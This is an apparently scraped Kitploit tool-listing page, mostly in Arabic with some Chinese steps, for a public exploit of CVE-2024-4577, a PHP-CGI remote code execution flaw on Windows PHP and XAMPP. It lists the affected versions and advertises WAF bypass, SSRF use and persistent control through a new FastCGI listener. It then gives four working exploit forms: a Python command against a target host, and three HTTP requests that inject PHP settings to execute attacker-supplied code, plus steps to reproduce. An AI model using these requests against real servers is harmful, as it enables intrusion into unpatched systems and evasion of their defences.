Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577-PHP-RCE — [إعادة إنتاج الثغرة] أول EXP في العالم يستغل بيئة PHP الافتراضية (XAMPP) لثغرة CVE-2024-4577 PHP-CGI RCE. | Kitploit
أدوات/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFاختبار الاختراقتطوير الحمولات
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[إعادة إنتاج الثغرة] أول EXP في العالم يستغل بيئة PHP الافتراضية (XAMPP) لثغرة CVE-2024-4577 PHP-CGI RCE.

عرض المستودع
16233منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4577-PHP-RCE

مقدمة المشروع والمبدأ

  • أول EXP في العالم يستغل ثغرة CVE-2024-4577 PHP-CGI RCE باستخدام بيئة PHP الافتراضية (XAMPP).
  • أول استغلال في العالم لثغرة CVE-2024-4577 PHP-CGI RCE باستخدام بيئة PHP الافتراضية. يشارك الاستغلال الأصلي، ويدعم SSRF، ويدعم تجاوز WAF.
  • تحقيق RCE في بيئة PHP الافتراضية. المبدأ: cgi.force_redirect + REDIRECT-STATUS.
  • إضافة EXP أصلي جديد يدعم أسلوب تجاوز WAF. المبدأ: إنشاء خادم FastCGI + الاتصال عبر بروتوكول FastCGI.
  • إضافة EXP أصلي جديد يدعم أسلوب سيناريو SSRF. المبدأ: بروتوكول data:// + طلب GET.

مزايا EXP 1

  • يمكن تحقيق RCE دون الحاجة إلى allow_url_include أو auto_prepend_file أو auto_append_file. يمكن تضمين أي ملف وملفات PHP.
  • لن تظهر الكلمات المفتاحية التي يعترضها WAF عادةً: allow_url_include، auto_prepend_file، auto_append_file.
  • جميع اتصالات خادم FastCGI لن يتم تسجيلها بواسطة WAF.
  • يستمع على منفذ جديد، وبالتالي يحقق تحكمًا دائمًا في خادم PHP، بشكل مستقل عن Apache وPHP.

ملخص الثغرة

المعلوماتالمحتوى
اسم الثغرةPHP RCE
رقم الثغرةCVE-2024-4577
مستوى الخطورةمرتفع
نوع الثغرةRCE

الإصدارات المتأثرة

  • PHP إصدار Windows 8.3.0 <= الإصدارات المتأثرة < 8.3.8
  • PHP إصدار Windows 8.2.0 <= الإصدارات المتأثرة < 8.2.20
  • PHP إصدار Windows 8.1.0 <= الإصدارات المتأثرة < 8.1.29
  • PHP إصدار Windows الإصدارات المتأثرة == 8.0.x
  • PHP إصدار Windows الإصدارات المتأثرة == 7.x
  • PHP إصدار Windows الإصدارات المتأثرة == 5.x
  • XAMPP إصدار Windows 8.2.0 <= الإصدارات المتأثرة <= 8.2.12
  • XAMPP إصدار Windows 8.1.0 <= الإصدارات المتأثرة <= 8.1.25
  • XAMPP إصدار Windows الإصدارات المتأثرة == 8.0.x
  • XAMPP إصدار Windows الإصدارات المتأثرة == 7.x
  • XAMPP إصدار Windows الإصدارات المتأثرة == 5.x

EXP 1

يمكن استخدامها في سيناريو تجاوز WAF + السيناريو الافتراضي:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

مثال:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

يمكن استخدامها في سيناريو SSRF + السيناريو الافتراضي:

root@kitploit:~
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

يمكن استخدامها في السيناريو الافتراضي:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

يمكن استخدامها في السيناريو الافتراضي:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

إعادة الإنتاج

  1. بيئة الخادم:
root@kitploit:~
XAMPP Windows版 8.2.12
  1. تنزيل وتثبيت XAMPP على الخادم:
root@kitploit:~
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

或者自主去这里挑受影响版本:https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/

  1. تكوين الخادم
root@kitploit:~
无需任何修改,保持默认配置
  1. استخدام EXP من العميل
root@kitploit:~
使用上述EXP进行测试
  1. التحقق
root@kitploit:~
观察是否返回字符串 "TesT" 或者服务端system.ini文件内容
تنزيل الأداة
صعوبة الاستغلال
منخفضة